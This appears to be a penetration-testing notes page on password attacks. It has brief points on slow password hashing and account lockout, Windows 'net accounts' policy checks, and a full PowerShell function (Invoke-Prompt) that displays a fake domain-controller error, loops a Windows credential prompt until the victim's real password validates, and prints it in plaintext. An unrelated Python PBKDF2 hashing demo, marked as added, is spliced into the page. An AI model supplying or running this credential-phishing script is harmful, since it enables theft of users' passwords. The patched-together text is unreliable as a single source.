Password Attacks
File hashing should be fast - used to determine integrity
Password hashing should be SLOW - used to increase amount of work for cracking
Be careful not to lock out legitimate users, as this will impact operational needs of the target
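The fast-versus-slow hashing point above, as an added example that is not part of the original page: it stores a password with salted PBKDF2-HMAC-SHA256, verifies it in constant time, and measures how much more one guess costs than a single SHA-256 pass. The iteration count and the sample password are assumptions constructed for the demo.

```python
from __future__ import annotations

import hashlib
import hmac
import os
import time

# Assumed work factor for this demo; tune it to your own hardware and latency budget.
PBKDF2_ITERATIONS = 200_000


def fast_hash(data: bytes) -> str:
    """Integrity-style hash: a single SHA-256 pass, cheap by design."""
    return hashlib.sha256(data).hexdigest()


def hash_password(password: str, salt: bytes | None = None,
                  iterations: int = PBKDF2_ITERATIONS) -> tuple[bytes, bytes, int]:
    """Slow, salted password hash (PBKDF2-HMAC-SHA256)."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, digest, iterations


def verify_password(password: str, salt: bytes, digest: bytes, iterations: int) -> bool:
    """Recompute with the stored salt and cost, then compare in constant time."""
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return hmac.compare_digest(candidate, digest)


def seconds_per_call(fn, rounds: int) -> float:
    """Average wall-clock cost of one call to fn."""
    start = time.perf_counter()
    for _ in range(rounds):
        fn()
    return (time.perf_counter() - start) / rounds


def work_factor(password: str = "Constructed-Sample-1!") -> float:
    """How many times more one slow-hash guess costs than one fast-hash guess."""
    salt = os.urandom(16)
    fast = seconds_per_call(lambda: fast_hash(salt + password.encode()), 2000)
    slow = seconds_per_call(lambda: hash_password(password, salt), 3)
    return slow / fast


if __name__ == "__main__":
    print(f"one PBKDF2 guess costs ~{work_factor():,.0f}x one SHA-256 guess")
```

The salt, digest and iteration count are stored together so the cost can be raised later without invalidating existing records.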
Check Windows password settings
net accounts
net accounts /domain
Sometimes, we can just ask for creds!
# POC from greg.foss[at]owasp.org
# @enigma0x3
# Adapted from http://blog.logrhythm.com/security/do-you-trust-your-computer/
# https://enigma0x3.wordpress.com/2015/01/21/phishing-for-credentials-if-you-want-it-just-ask/

function Invoke-Prompt {
    [CmdletBinding()]
    Param (
        [Switch] $ProcCreateWait,
        [String] $MsgText = 'Lost contact with the Domain Controller.',
        [String] $IconType = 'Critical',
        [String] $Title = 'ERROR - 0xA801B720'
    )
    Add-Type -AssemblyName Microsoft.VisualBasic
    Add-Type -assemblyname System.DirectoryServices.AccountManagement
    $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine)

    if($MsgText -and $($MsgText -ne '')){
        $null = [Microsoft.VisualBasic.Interaction]::MsgBox($MsgText, "OKOnly,MsgBoxSetForeground,SystemModal,$IconType", $Title)
    }

    $c=[System.Security.Principal.WindowsIdentity]::GetCurrent().name
    $credential = $host.ui.PromptForCredential("Credentials Required", "Please enter your user name and password.", $c, "NetBiosUserName")

    if($credential){
        while($DS.ValidateCredentials($c, $credential.GetNetworkCredential().password) -ne $True){
            $credential = $Host.ui.PromptForCredential("Windows Security", "Invalid Credentials, Please try again", "$env:userdomain\$env:username","")
        }
        "[+] Prompted credentials: -> " + $c + ":" + $credential.GetNetworkCredential().password
    }
    else{
        "[!] User closed credential prompt"
    }
}